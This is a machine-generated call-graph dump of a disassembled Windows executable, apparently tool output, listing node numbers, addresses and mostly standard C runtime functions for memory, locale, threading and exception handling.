17330 570b38 17327->17330 17332 578faf WideCharToMultiByte _Fputc 17327->17332 17333 574396 ___free_lconv_mon 14 API calls 17327->17333 17328->17307 17329->17327 17331 574396 ___free_lconv_mon 14 API calls 17330->17331 17331->17328 17332->17327 17333->17327 17335 57096a 17334->17335 17336 57a068 17334->17336 17340 57a361 GetEnvironmentStringsW 17335->17340 17389 57319b 17336->17389 17341 57a379 17340->17341 17356 57096f 17340->17356 17342 578faf _Fputc WideCharToMultiByte 17341->17342 17343 57a396 17342->17343 17344 57a3a0 FreeEnvironmentStringsW 17343->17344 17345 57a3ab 17343->17345 17344->17356 17346 5745c0 __strnicoll 15 API calls 17345->17346 17347 57a3b2 17346->17347 17348 57a3cb 17347->17348 17349 57a3ba 17347->17349 17350 578faf _Fputc WideCharToMultiByte 17348->17350 17351 574396 ___free_lconv_mon 14 API calls 17349->17351 17352 57a3db 17350->17352 17353 57a3bf FreeEnvironmentStringsW 17351->17353 17354 57a3e2 17352->17354 17355 57a3ea 17352->17355 17353->17356 17357 574396 ___free_lconv_mon 14 API calls 17354->17357 17358 574396 ___free_lconv_mon 14 API calls 17355->17358 17356->17316 17356->17317 17359 57a3e8 FreeEnvironmentStringsW 17357->17359 17358->17359 17359->17356 17362 5743a1 HeapFree 17361->17362 17363 57097b 17361->17363 17362->17363 17364 5743b6 GetLastError 17362->17364 17363->17306 17365 5743c3 __dosmaperr 17364->17365 17366 56e2e0 __dosmaperr 12 API calls 17365->17366 17366->17363 17368 5709c7 17367->17368 17369 574339 __Getctype 14 API calls 17368->17369 17370 5709ee 17369->17370 17371 5709f6 17370->17371 17377 570a00 17370->17377 17372 574396 ___free_lconv_mon 14 API calls 17371->17372 17373 570988 17372->17373 17373->17322 17374 570a5d 17375 574396 ___free_lconv_mon 14 API calls 17374->17375 17375->17373 17376 574339 __Getctype 14 API calls 17376->17377 17377->17374 17377->17376 17378 570a6c 17377->17378 17383 570a87 17377->17383 17385 574396 ___free_lconv_mon 14 API calls 17377->17385 17940 572c88 17377->17940 17949 570a94 17378->17949 17382 574396 ___free_lconv_mon 14 API calls 17384 570a79 17382->17384 17955 56acfc IsProcessorFeaturePresent 17383->17955 17388 574396 ___free_lconv_mon 14 API calls 17384->17388 17385->17377 17387 570a93 17388->17373 17390 5731a6 17389->17390 17391 5731ac 17389->17391 17437 575c98 17390->17437 17411 5731b2 17391->17411 17442 575cd7 17391->17442 17399 5731f3 17402 575cd7 __Getctype 6 API calls 17399->17402 17400 5731de 17401 575cd7 __Getctype 6 API calls 17400->17401 17403 5731ea 17401->17403 17404 5731ff 17402->17404 17409 574396 ___free_lconv_mon 14 API calls 17403->17409 17405 573203 17404->17405 17406 573212 17404->17406 17407 575cd7 __Getctype 6 API calls 17405->17407 17456 572f0e 17406->17456 17407->17403 17409->17411 17413 5731b7 17411->17413 17461 5700d9 17411->17461 17414 579e6a 17413->17414 17742 579fbf 17414->17742 17419 579ead 17419->17335 17422 579ec6 17425 574396 ___free_lconv_mon 14 API calls 17422->17425 17423 579ed4 17767 57a0ba 17423->17767 17425->17419 17472 575a87 17437->17472 17440 575ccf TlsGetValue 17441 575cbd 17441->17391 17443 575a87 std::_Lockit::_Lockit 5 API calls 17442->17443 17444 575cf3 17443->17444 17445 575d11 TlsSetValue 17444->17445 17446 5731c6 17444->17446 17446->17411 17447 574339 17446->17447 17448 574346 17447->17448 17449 574386 17448->17449 17450 574371 HeapAlloc 17448->17450 17451 57435a __Getctype 17448->17451 17490 56e2e0 17449->17490 17450->17451 17452 574384 17450->17452 17451->17449 17451->17450 17487 5703b0 17451->17487 17454 5731d6 17452->17454 17454->17399 17454->17400 17527 572da2 17456->17527 17629 578cfb 17461->17629 17465 570112 17467 570f58 std::locale::_Setgloballocale 23 API calls 17465->17467 17466 5700f3 IsProcessorFeaturePresent 17469 5700ff 17466->17469 17470 57011c 17467->17470 17468 5700e9 17468->17465 17468->17466 17659 56aad3 17469->17659 17473 575ab5 17472->17473 17477 575ab1 17472->17477 17473->17477 17479 5759bc 17473->17479 17476 575acf GetProcAddress 17476->17477 17478 575adf std::_Lockit::_Lockit 17476->17478 17477->17440 17477->17441 17478->17477 17485 5759cd ___vcrt_FlsFree 17479->17485 17480 575a63 17480->17476 17480->17477 17481 5759eb LoadLibraryExW 17482 575a06 GetLastError 17481->17482 17483 575a6a 17481->17483 17482->17485 17483->17480 17484 575a7c FreeLibrary 17483->17484 17484->17480 17485->17480 17485->17481 17486 575a39 LoadLibraryExW 17485->17486 17486->17483 17486->17485 17493 5703dd 17487->17493 17504 573231 GetLastError 17490->17504 17492 56e2e5 17492->17454 17494 5703e9 __FrameHandler3::FrameUnwindToState 17493->17494 17499 56d9e4 EnterCriticalSection 17494->17499 17496 5703f4 17500 570430 17496->17500 17499->17496 17503 56da2c LeaveCriticalSection 17500->17503 17502 5703bb 17502->17451 17503->17502 17505 573247 17504->17505 17508 57324d 17504->17508 17506 575c98 __Getctype 6 API calls 17505->17506 17506->17508 17507 575cd7 __Getctype 6 API calls 17509 573269 17507->17509 17508->17507 17525 573251 SetLastError 17508->17525 17510 574339 __Getctype 12 API calls 17509->17510 17509->17525 17512 57327e 17510->17512 17513 573297 17512->17513 17514 573286 17512->17514 17516 575cd7 __Getctype 6 API calls 17513->17516 17515 575cd7 __Getctype 6 API calls 17514->17515 17517 573294 17515->17517 17518 5732a3 17516->17518 17522 574396 ___free_lconv_mon 12 API calls 17517->17522 17519 5732a7 17518->17519 17520 5732be 17518->17520 17521 575cd7 __Getctype 6 API calls 17519->17521 17523 572f0e __Getctype 12 API calls 17520->17523 17521->17517 17522->17525 17524 5732c9 17523->17524 17526 574396 ___free_lconv_mon 12 API calls 17524->17526 17525->17492 17526->17525 17528 572dae __FrameHandler3::FrameUnwindToState 17527->17528 17541 56d9e4 EnterCriticalSection 17528->17541 17530 572db8 17542 572de8 17530->17542 17533 572eb4 17541->17530 17545 56da2c LeaveCriticalSection 17542->17545 17544 572dd6 17544->17533 17545->17544 17665 578c2d 17629->17665 17632 578d40 17633 578d4c __FrameHandler3::FrameUnwindToState 17632->17633 17634 573231 __dosmaperr 14 API calls 17633->17634 17637 578d79 std::locale::_Setgloballocale 17633->17637 17640 578d73 std::locale::_Setgloballocale 17633->17640 17634->17640 17635 578dc0 17636 56e2e0 __dosmaperr 14 API calls 17635->17636 17638 578dc5 17636->17638 17639 578dec 17637->17639 17679 56d9e4 EnterCriticalSection 17637->17679 17676 56accf 17638->17676 17644 578f1f 17639->17644 17645 578e2e 17639->17645 17655 578e5d 17639->17655 17640->17635 17640->17637 17658 578daa 17640->17658 17647 578f2a 17644->17647 17711 56da2c LeaveCriticalSection 17644->17711 17645->17655 17680 5730e0 GetLastError 17645->17680 17649 570f58 std::locale::_Setgloballocale 23 API calls 17647->17649 17650 578f32 17649->17650 17652 5730e0 __Getctype 41 API calls 17656 578eb2 17652->17656 17654 5730e0 __Getctype 41 API calls 17654->17655 17707 578ecc 17655->17707 17657 5730e0 __Getctype 41 API calls 17656->17657 17656->17658 17657->17658 17658->17468 17660 56aaef codecvt std::locale::_Setgloballocale 17659->17660 17661 56ab1b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17660->17661 17662 56abec std::locale::_Setgloballocale 17661->17662 17734 5662ac 17662->17734 17664 56ac0a 17664->17465 17666 578c39 __FrameHandler3::FrameUnwindToState 17665->17666 17671 56d9e4 EnterCriticalSection 17666->17671 17668 578c47 17672 578c85 17668->17672 17671->17668 17675 56da2c LeaveCriticalSection 17672->17675 17674 5700de 17674->17468 17674->17632 17675->17674 17712 56ac1b 17676->17712 17679->17639 17681 5730f6 17680->17681 17682 5730fc 17680->17682 17683 575c98 __Getctype 6 API calls 17681->17683 17684 575cd7 __Getctype 6 API calls 17682->17684 17704 573100 SetLastError 17682->17704 17683->17682 17685 573118 17684->17685 17687 574339 __Getctype 14 API calls 17685->17687 17685->17704 17690 57312d 17687->17690 17688 573195 17691 5700d9 __purecall 39 API calls 17688->17691 17689 573190 17689->17654 17692 573146 17690->17692 17693 573135 17690->17693 17695 57319a 17691->17695 17704->17688 17704->17689 17708 578ed2 17707->17708 17709 578ea3 17707->17709 17733 56da2c LeaveCriticalSection 17708->17733 17709->17652 17709->17656 17709->17658 17711->17647 17713 56ac2d _Fputc 17712->17713 17718 56ac52 17713->17718 17719 56ac62 17718->17719 17720 56ac69 17718->17720 17721 56aa70 _Fputc 16 API calls 17719->17721 17722 56aa47 _Deallocate GetLastError SetLastError 17720->17722 17724 56ac45 17720->17724 17721->17720 17733->17709 17735 5662b4 17734->17735 17736 5662b5 IsProcessorFeaturePresent 17734->17736 17735->17664 17738 566ad2 17736->17738 17741 566a95 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17738->17741 17740 566bb5 17740->17664 17741->17740 17743 579fcb __FrameHandler3::FrameUnwindToState 17742->17743 17750 579fe5 17743->17750 17786 56d9e4 EnterCriticalSection 17743->17786 17745 57a021 17787 57a03e 17745->17787 17747 5700d9 __purecall 41 API calls 17751 57a05e 17747->17751 17748 579e94 17753 579bea 17748->17753 17749 579ff5 17749->17745 17752 574396 ___free_lconv_mon 14 API calls 17749->17752 17750->17747 17750->17748 17752->17745 17791 56fb3a 17753->17791 17756 579c1d 17758 579c34 17756->17758 17759 579c22 GetACP 17756->17759 17757 579c0b GetOEMCP 17757->17758 17758->17419 17760 5745c0 17758->17760 17759->17758 17761 5745fe 17760->17761 17766 5745ce __Getctype 17760->17766 17762 56e2e0 __dosmaperr 14 API calls 17761->17762 17764 5745fc 17762->17764 17763 5745e9 RtlAllocateHeap 17763->17764 17763->17766 17764->17422 17764->17423 17765 5703b0 std::ios_base::_Init 2 API calls 17765->17766 17766->17761 17766->17763 17766->17765 17768 579bea 43 API calls 17767->17768 17769 57a0da 17768->17769 17770 57a117 IsValidCodePage 17769->17770 17776 57a153 codecvt 17769->17776 17773 57a129 17770->17773 17770->17776 17771 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17776->17771 17786->17749 17790 56da2c LeaveCriticalSection 17787->17790 17789 57a045 17789->17750 17790->17789 17792 56fb51 17791->17792 17793 56fb58 17791->17793 17792->17756 17792->17757 17793->17792 17794 5730e0 __Getctype 41 API calls 17793->17794 17795 56fb79 17794->17795 17799 574504 17795->17799 17800 574517 17799->17800 17802 56fb8f 17799->17802 17800->17802 17807 57b9f5 17800->17807 17803 574562 17802->17803 17804 574575 17803->17804 17805 57458a 17803->17805 17804->17805 17828 57a0a7 17804->17828 17805->17792 17808 57ba01 __FrameHandler3::FrameUnwindToState 17807->17808 17809 5730e0 __Getctype 41 API calls 17808->17809 17810 57ba0a 17809->17810 17811 57ba50 17810->17811 17820 56d9e4 EnterCriticalSection 17810->17820 17811->17802 17813 57ba28 17821 57ba76 17813->17821 17820->17813 17822 57ba39 17821->17822 17823 57ba84 __Getctype 17821->17823 17823->17822 17829 5730e0 __Getctype 41 API calls 17828->17829 17830 57a0ac 17829->17830 17831 579fbf __strnicoll 41 API calls 17830->17831 17832 57a0b7 17831->17832 17832->17805 17941 572ca4 17940->17941 17942 572c96 17940->17942 17943 56e2e0 __dosmaperr 14 API calls 17941->17943 17942->17941 17946 572cbc 17942->17946 17948 572cac 17943->17948 17944 56accf __strnicoll 41 API calls 17945 572cb6 17944->17945 17945->17377 17946->17945 17947 56e2e0 __dosmaperr 14 API calls 17946->17947 17947->17948 17948->17944 17950 570aa1 17949->17950 17951 570a72 17949->17951 17952 570ab8 17950->17952 17953 574396 ___free_lconv_mon 14 API calls 17950->17953 17951->17382 17954 574396 ___free_lconv_mon 14 API calls 17952->17954 17953->17950 17954->17951 17956 56ad08 17955->17956 17957 56aad3 std::locale::_Setgloballocale 8 API calls 17956->17957 17958 56ad1d GetCurrentProcess TerminateProcess 17957->17958 17958->17387 17960 561f64 _strlen 17959->17960 17998 5611cf 17960->17998 17962 561f71 17963 56626e 17962->17963 17965 566273 17963->17965 17964 56da5a ___std_exception_copy 15 API calls 17964->17965 17965->17964 17966 56628d 17965->17966 17967 5703b0 std::ios_base::_Init 2 API calls 17965->17967 17969 5632ce Concurrency::cancel_current_task 17965->17969 17966->17185 17983 583000 17966->17983 17967->17965 17968 566299 17968->17968 17969->17968 17970 568e4c CallUnexpected RaiseException 17969->17970 17971 5632ea std::ios_base::_Init 17970->17971 17972 568e4c CallUnexpected RaiseException 17971->17972 17973 563307 17972->17973 17974 56ac1b _Deallocate 41 API calls 17973->17974 17975 56acee 17974->17975 17976 56acfc _Deallocate 11 API calls 17975->17976 17977 56acfb 17976->17977 18060 5833c3 17978->18060 17984 5830fa 17983->17984 17993 583030 17983->17993 18597 563333 17984->18597 17986 561f47 43 API calls std::ios_base::_Init 17986->17993 17988 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17989 583114 17988->17989 17989->17185 17990 56405f 43 API calls 17990->17993 17991 56b91e 44 API calls 17991->17993 17992 563359 41 API calls std::ios_base::_Init 17992->17993 17993->17984 17993->17986 17993->17990 17993->17991 17993->17992 17999 56123a 17998->17999 18001 5611e0 std::ios_base::_Init 17998->18001 18013 5633a8 17999->18013 18004 5611e7 std::ios_base::_Init 18001->18004 18005 56116b 18001->18005 18004->17962 18006 561176 18005->18006 18007 56117e 18005->18007 18018 56118d 18006->18018 18009 56118a 18007->18009 18010 56626e std::ios_base::_Init 43 API calls 18007->18010 18009->18004 18012 561188 18010->18012 18012->18004 18034 564438 18013->18034 18019 5632ce Concurrency::cancel_current_task 18018->18019 18020 56119c 18018->18020 18031 568e4c 18019->18031 18021 56626e std::ios_base::_Init 43 API calls 18020->18021 18022 5611a2 18021->18022 18024 56117c 18022->18024 18026 56ac1b _Deallocate 41 API calls 18022->18026 18024->18004 18025 5632ea std::ios_base::_Init 18029 568e4c CallUnexpected RaiseException 18025->18029 18027 56acee 18026->18027 18028 56acfc _Deallocate 11 API calls 18027->18028 18030 56acfb 18028->18030 18029->18022 18032 568e66 18031->18032 18033 568e93 RaiseException 18031->18033 18032->18033 18033->18025 18039 56435b 18034->18039 18037 568e4c CallUnexpected RaiseException 18038 564457 18037->18038 18042 5621a0 18039->18042 18045 568dca 18042->18045 18046 5621cc 18045->18046 18047 568dd7 18045->18047 18046->18037 18047->18046 18053 56da5a 18047->18053 18050 568e04 18052 56aefa __freea 14 API calls 18050->18052 18051 572c88 ___std_exception_copy 41 API calls 18051->18050 18052->18046 18057 5745c0 __Getctype 18053->18057 18054 5745fe 18055 56e2e0 __dosmaperr 14 API calls 18054->18055 18058 568df4 18055->18058 18056 5745e9 RtlAllocateHeap 18056->18057 18056->18058 18057->18054 18057->18056 18059 5703b0 std::ios_base::_Init 2 API calls 18057->18059 18058->18050 18058->18051 18059->18057 18061 5833a9 18060->18061 18063 5833d1 18060->18063 18065 5831de 18061->18065 18063->18061 18081 562454 18063->18081 18091 561d5b 18063->18091 18523 5611b8 18065->18523 18068 561f47 std::ios_base::_Init 43 API calls 18069 583229 18068->18069 18526 5613ec 18069->18526 18071 583244 18072 563359 std::ios_base::_Init 41 API calls 18071->18072 18073 58324d 18072->18073 18074 583375 18073->18074 18536 561474 18073->18536 18546 5613c0 18073->18546 18550 561537 18074->18550 18082 562460 __EH_prolog3_catch 18081->18082 18098 562247 18082->18098 18085 562499 std::ios_base::_Ios_base_dtor 18117 5634b8 18085->18117 18090 562543 std::ios_base::_Init 18090->18063 18370 5641cf 18091->18370 18093 561d6e 18374 56409b 18093->18374 18100 562256 18098->18100 18099 562274 18099->18085 18102 561dfd 18099->18102 18100->18099 18129 563ee5 18100->18129 18137 5642b1 18102->18137 18106 561e21 18116 561e34 18106->18116 18149 562a25 18106->18149 18111 561e70 18112 561e4b 18157 5645fc 18112->18157 18160 564309 18116->18160 18118 56253b 18117->18118 18119 5634cf std::ios_base::_Init 18117->18119 18124 562413 18118->18124 18123 563508 18119->18123 18298 5621ed 18119->18298 18120 568e4c CallUnexpected RaiseException 18121 563521 18120->18121 18123->18120 18352 564498 18124->18352 18126 56241b 18127 5623d4 18126->18127 18356 563185 18126->18356 18127->18090 18130 563ef1 __EH_prolog3_catch 18129->18130 18131 563f96 std::ios_base::_Init 18130->18131 18132 562247 51 API calls 18130->18132 18131->18099 18135 563f10 18132->18135 18133 563f8e 18134 562413 51 API calls 18133->18134 18134->18131 18135->18133 18136 5634b8 std::ios_base::_Init 43 API calls 18135->18136 18136->18133 18138 5642c7 18137->18138 18139 5642c0 18137->18139 18142 561e0e 18138->18142 18180 566020 EnterCriticalSection 18138->18180 18175 56da43 18139->18175 18143 562577 18142->18143 18144 5625a7 18143->18144 18145 562583 18143->18145 18144->18106 18146 5642b1 std::_Lockit::_Lockit 7 API calls 18145->18146 18147 56258d 18146->18147 18148 564309 std::_Lockit::~_Lockit 2 API calls 18147->18148 18148->18144 18150 561e44 18149->18150 18151 562a39 18149->18151 18150->18111 18150->18112 18151->18150 18152 56626e std::ios_base::_Init 43 API calls 18151->18152 18161 564313 18160->18161 18162 56da51 18160->18162 18181 575eef 18175->18181 18180->18142 18202 57589e 18181->18202 18203 575a87 std::_Lockit::_Lockit 5 API calls 18202->18203 18204 5758b4 18203->18204 18205 5758b8 18204->18205 18206 575a87 std::_Lockit::_Lockit 5 API calls 18205->18206 18301 5622a7 18298->18301 18302 561f47 std::ios_base::_Init 43 API calls 18301->18302 18303 5622c6 18302->18303 18310 562072 18303->18310 18321 561f13 18310->18321 18322 561f33 18321->18322 18352->18126 18353 569267 18352->18353 18360 56970c 18353->18360 18355 56926c 18355->18126 18357 563191 __EH_prolog3_catch 18356->18357 18358 5631cd std::ios_base::_Init 18357->18358 18359 5634b8 std::ios_base::_Init 43 API calls 18357->18359 18358->18127 18359->18358 18361 569715 18360->18361 18362 569718 GetLastError 18360->18362 18361->18355 18365 56a883 18362->18365 18366 56a722 ___vcrt_FlsFree 5 API calls 18365->18366 18371 5641e3 18370->18371 18384 561d84 18371->18384 18373 5641ec std::ios_base::_Ios_base_dtor 18373->18093 18375 5640a7 __EH_prolog3_catch 18374->18375 18385 5642b1 std::_Lockit::_Lockit 7 API calls 18384->18385 18386 561d95 18385->18386 18387 562577 int 9 API calls 18386->18387 18390 561da8 18387->18390 18388 561dbb 18389 564309 std::_Lockit::~_Lockit 2 API calls 18388->18389 18391 561df1 18389->18391 18390->18388 18399 5629c0 18390->18399 18391->18373 18394 561df7 18396 5632eb 42 API calls 18394->18396 18395 561dd2 18397 5645fc std::_Facet_Register 43 API calls 18395->18397 18398 561dfc 18396->18398 18397->18388 18400 5629d4 18399->18400 18401 561dcb 18399->18401 18400->18401 18402 56626e std::ios_base::_Init 43 API calls 18400->18402 18401->18394 18401->18395 18403 5629e0 codecvt 18402->18403 18404 562a09 18403->18404 18405 561ff9 codecvt 72 API calls 18403->18405 18404->18401 18406 562357 std::_Locinfo::~_Locinfo 69 API calls 18404->18406 18407 5629f8 18405->18407 18406->18401 18409 562ba1 18407->18409 18524 56626e std::ios_base::_Init 43 API calls 18523->18524 18525 5611bf 18524->18525 18525->18068 18527 561403 18526->18527 18528 56141d 18527->18528 18529 561431 18527->18529 18530 56146e 18527->18530 18528->18071 18553 561100 18529->18553 18562 563308 18530->18562 18537 561480 __EH_prolog3_catch 18536->18537 18538 5614a0 18537->18538 18539 56152c 18537->18539 18547 5613cd 18546->18547 18549 5613da std::ios_base::_Ios_base_dtor 18546->18549 18582 56277d 18547->18582 18549->18073 18589 561557 18550->18589 18554 56626e std::ios_base::_Init 43 API calls 18553->18554 18555 561116 18554->18555 18556 561f13 std::ios_base::_Init 43 API calls 18555->18556 18557 561129 18556->18557 18558 5622f6 18557->18558 18563 564438 std::ios_base::_Init 43 API calls 18562->18563 18564 563312 18563->18564 18598 56334b 18597->18598 18599 56333b 18597->18599 18598->17988 18600 5613c0 _Deallocate 41 API calls 18599->18600 18600->18598 18602 570dbb 18601->18602 18603 570da9 18601->18603 18613 570c44 18602->18613 18628 570e44 GetModuleHandleW 18603->18628 18607 5665dd 18607->17218 18614 570c50 __FrameHandler3::FrameUnwindToState 18613->18614 18636 56d9e4 EnterCriticalSection 18614->18636 18616 570c5a 18637 570c91 18616->18637 18618 570c67 18641 570c85 18618->18641 18621 570e13 18666 570e87 18621->18666 18624 570e31 18626 570ea9 std::locale::_Setgloballocale 3 API calls 18624->18626 18625 570e21 GetCurrentProcess TerminateProcess 18625->18624 18627 570e39 ExitProcess 18626->18627 18629 570dae 18628->18629 18629->18602 18630 570ea9 GetModuleHandleExW 18629->18630 18631 570f09 18630->18631 18632 570ee8 GetProcAddress 18630->18632 18634 570f0f FreeLibrary 18631->18634 18635 570dba 18631->18635 18632->18631 18633 570efc 18632->18633 18633->18631 18634->18635 18635->18602 18636->18616 18638 570c9d __FrameHandler3::FrameUnwindToState 18637->18638 18639 570d04 std::locale::_Setgloballocale 18638->18639 18644 572a16 18638->18644 18639->18618 18665 56da2c LeaveCriticalSection 18641->18665 18643 570c73 18643->18607 18643->18621 18645 572a22 __EH_prolog3 18644->18645 18648 57276e 18645->18648 18647 572a49 std::ios_base::_Init 18647->18639 18649 57277a __FrameHandler3::FrameUnwindToState 18648->18649 18656 56d9e4 EnterCriticalSection 18649->18656 18651 572788 18657 572926 18651->18657 18656->18651 18658 572795 18657->18658 18659 572945 18657->18659 18661 5727bd 18658->18661 18659->18658 18660 574396 ___free_lconv_mon 14 API calls 18659->18660 18660->18658 18664 56da2c LeaveCriticalSection 18661->18664 18663 5727a6 18663->18647 18664->18663 18665->18643 18671 57a789 GetPEB 18666->18671 18669 570e91 GetPEB 18670 570e1d 18669->18670 18670->18624 18670->18625 18672 57a7a3 18671->18672 18674 570e8c 18671->18674 18675 575b0a 18672->18675 18674->18669 18674->18670 18676 575a87 std::_Lockit::_Lockit 5 API calls 18675->18676 18677 575b26 18676->18677 18677->18674 21516 565b60 21517 565b9e 21516->21517 21518 565b69 21516->21518 21518->21517 21521 56ef7b 21518->21521 21520 565b91 21522 56ef8d 21521->21522 21526 56ef96 ___scrt_uninitialize_crt 21521->21526 21523 56edff ___scrt_uninitialize_crt 70 API calls 21522->21523 21524 56ef93 21523->21524 21524->21520 21525 56efa7 21525->21520 21526->21525 21529 56ed9f 21526->21529 21530 56edab __FrameHandler3::FrameUnwindToState 21529->21530 21537 56e417 EnterCriticalSection 21530->21537 21532 56edb9 21533 56ef0d ___scrt_uninitialize_crt 70 API calls 21532->21533 21534 56edca 21533->21534 21538 56edf3 21534->21538 21537->21532 21541 56e42b LeaveCriticalSection 21538->21541 21540 56eddc 21540->21520 21541->21540 21688 565b05 21689 565b14 21688->21689 21691 565b38 21689->21691 21692 56f994 21689->21692 21693 56f9a7 _Fputc 21692->21693 21698 56f8cb 21693->21698 21695 56f9bc 21696 56aa0b _Fputc 41 API calls 21695->21696 21697 56f9c9 21696->21697 21697->21691 21699 56f8dd 21698->21699 21702 56f900 21698->21702 21700 56ac52 _Deallocate 29 API calls 21699->21700 21701 56f8f8 21700->21701 21701->21695 21702->21699 21703 56f927 21702->21703 21706 56f7d0 21703->21706 21707 56f7dc __FrameHandler3::FrameUnwindToState 21706->21707 21714 56e417 EnterCriticalSection 21707->21714 21709 56f7ea 21715 56f82b 21709->21715 21711 56f7f7 21724 56f81f 21711->21724 21714->21709 21716 56eea4 ___scrt_uninitialize_crt 66 API calls 21715->21716 21717 56f846 21716->21717 21727 576d01 21717->21727 21720 574339 __Getctype 14 API calls 21721 56f88f 21720->21721 21722 574396 ___free_lconv_mon 14 API calls 21721->21722 21723 56f86b 21722->21723 21723->21711 21731 56e42b LeaveCriticalSection 21724->21731 21726 56f808 21726->21695 21728 56f850 21727->21728 21729 576d18 21727->21729 21728->21720 21728->21723 21729->21728 21730 574396 ___free_lconv_mon 14 API calls 21729->21730 21730->21728 21731->21726 21857 5713d2 21860 57109e 21857->21860 21861 5710aa __FrameHandler3::FrameUnwindToState 21860->21861 21868 56d9e4 EnterCriticalSection 21861->21868 21863 5710b4 21864 5710e2 21863->21864 21866 57ba76 __Getctype 14 API calls 21863->21866 21869 571100 21864->21869 21866->21863 21868->21863 21872 56da2c LeaveCriticalSection 21869->21872 21871 5710ee 21872->21871 18907 562dd1 18908 562e03 18907->18908 18909 561d84 73 API calls 18908->18909 18910 562e59 std::ios_base::_Ios_base_dtor 18909->18910 18939 561fa0 18910->18939 18914 562f60 18917 562fb6 18914->18917 18918 562f67 18914->18918 18915 563008 18919 5631e2 70 API calls 18915->18919 18916 562f24 18916->18914 18916->18915 18921 5631e2 70 API calls 18917->18921 18968 563217 18918->18968 18922 562fb1 18919->18922 18924 562fd9 18921->18924 18957 5631e2 18922->18957 18928 563217 70 API calls 18924->18928 18926 5631e2 70 API calls 18926->18922 18927 562ea9 std::ios_base::_Ios_base_dtor 18927->18916 18961 563fa3 18927->18961 18928->18922 18931 563217 70 API calls 18932 563098 18931->18932 18933 563359 std::ios_base::_Init 41 API calls 18932->18933 18934 5630a4 18933->18934 18972 56337f 18934->18972 18937 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18938 5630be 18937->18938 18976 561323 18939->18976 18941 561fc1 18942 561e76 18941->18942 18943 5642b1 std::_Lockit::_Lockit 7 API calls 18942->18943 18944 561e87 18943->18944 18945 562577 int 9 API calls 18944->18945 18946 561e9a 18945->18946 18956 561ead 18946->18956 18990 562a82 18946->18990 18947 564309 std::_Lockit::~_Lockit 2 API calls 18949 561ee3 18947->18949 18949->18927 18951 561ec4 18953 5645fc std::_Facet_Register 43 API calls 18951->18953 18952 561ee9 18954 5632eb 42 API calls 18952->18954 18953->18956 18955 561eee 18954->18955 18956->18947 18958 563068 18957->18958 18959 5631ed 18957->18959 18958->18931 18959->18958 19056 56242e 18959->19056 18962 563fb4 18961->18962 18963 56400e 18961->18963 18966 563fc0 18962->18966 19060 561ac5 18962->19060 19069 5633be 18963->19069 18966->18927 18969 562f7f 18968->18969 18970 563222 18968->18970 18969->18926 18970->18969 18971 56242e 70 API calls 18970->18971 18971->18970 18973 5630ad 18972->18973 18974 563388 18972->18974 18973->18937 18975 56287b 41 API calls 18974->18975 18975->18973 18977 561398 18976->18977 18981 561334 18976->18981 18978 5633a8 std::ios_base::_Init 43 API calls 18977->18978 18979 56139d 18978->18979 18980 56133b 18980->18941 18981->18980 18983 5633e7 18981->18983 18984 5633f2 18983->18984 18985 5633fe 18983->18985 18986 56116b std::ios_base::_Init 43 API calls 18984->18986 18987 5632ce Concurrency::cancel_current_task 42 API calls 18985->18987 18989 5633fa 18986->18989 18988 563403 18987->18988 18989->18980 18991 561ebd 18990->18991 18992 562a96 18990->18992 18991->18951 18991->18952 18992->18991 18993 56626e std::ios_base::_Init 43 API calls 18992->18993 18995 562aa2 codecvt 18993->18995 18994 562acd 18994->18991 18996 562357 std::_Locinfo::~_Locinfo 69 API calls 18994->18996 18995->18994 18997 561ff9 codecvt 72 API calls 18995->18997 18996->18991 18998 562aba 18997->18998 19000 562bda 18998->19000 19019 56d97b 19000->19019 19003 5648ac codecvt 41 API calls 19004 562c05 19003->19004 19005 5648ac codecvt 41 API calls 19004->19005 19006 562c38 19005->19006 19024 5619d8 19006->19024 19008 562c44 19029 561a14 19008->19029 19011 561a14 17 API calls 19012 562c6d 19011->19012 19013 562c9b 19012->19013 19039 5619a7 19012->19039 19016 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19013->19016 19018 562cc9 19016->19018 19017 5619a7 16 API calls 19017->19013 19018->18994 19020 5730e0 __Getctype 41 API calls 19019->19020 19021 56d986 19020->19021 19022 574504 __Getctype 41 API calls 19021->19022 19023 562bf9 19022->19023 19023->19003 19025 5619e3 __Getctype _strlen 19024->19025 19028 5619f7 codecvt 19025->19028 19042 56441b 19025->19042 19028->19008 19032 561a2e _strlen 19029->19032 19030 561a62 __Getctype 19033 561abf 19030->19033 19038 561a77 19030->19038 19032->19030 19046 56497b 19032->19046 19035 56441b Concurrency::cancel_current_task RaiseException 19033->19035 19034 561aac 19034->19011 19036 561ac4 19035->19036 19037 56497b 16 API calls 19037->19038 19038->19034 19038->19037 19040 56497b 16 API calls 19039->19040 19041 5619cf 19040->19041 19041->19017 19043 564429 Concurrency::cancel_current_task 19042->19043 19044 568e4c CallUnexpected RaiseException 19043->19044 19045 564437 19044->19045 19047 564985 19046->19047 19050 564989 19046->19050 19047->19032 19048 564993 19048->19032 19049 564a75 MultiByteToWideChar 19049->19048 19053 5649cf 19049->19053 19050->19048 19050->19049 19051 5649c5 19050->19051 19052 564a32 19050->19052 19051->19049 19051->19053 19052->19048 19055 564a5b MultiByteToWideChar 19052->19055 19053->19048 19054 56e2e0 __dosmaperr 14 API calls 19053->19054 19054->19048 19055->19048 19055->19053 19057 562438 19056->19057 19058 562441 19056->19058 19059 56418d 70 API calls 19057->19059 19058->18959 19059->19058 19061 561b53 19060->19061 19062 561ade 19060->19062 19063 5633a8 std::ios_base::_Init 43 API calls 19061->19063 19065 5633e7 43 API calls 19062->19065 19064 561b58 19063->19064 19066 561b02 19065->19066 19068 561b37 19066->19068 19072 56287b 19066->19072 19068->18966 19075 564458 19069->19075 19073 5613c0 _Deallocate 41 API calls 19072->19073 19074 562890 19073->19074 19074->19068 19080 5643b0 19075->19080 19078 568e4c CallUnexpected RaiseException 19079 564477 19078->19079 19081 5621a0 std::exception::exception 42 API calls 19080->19081 19082 5643c2 19081->19082 19082->19078 20395 576ed0 20396 576edf 20395->20396 20400 576ef4 20395->20400 20397 56e2e0 __dosmaperr 14 API calls 20396->20397 20398 576ee4 20397->20398 20399 56accf __strnicoll 41 API calls 20398->20399 20409 576eef 20399->20409 20401 576f52 20400->20401 20402 5774e6 _Ungetc 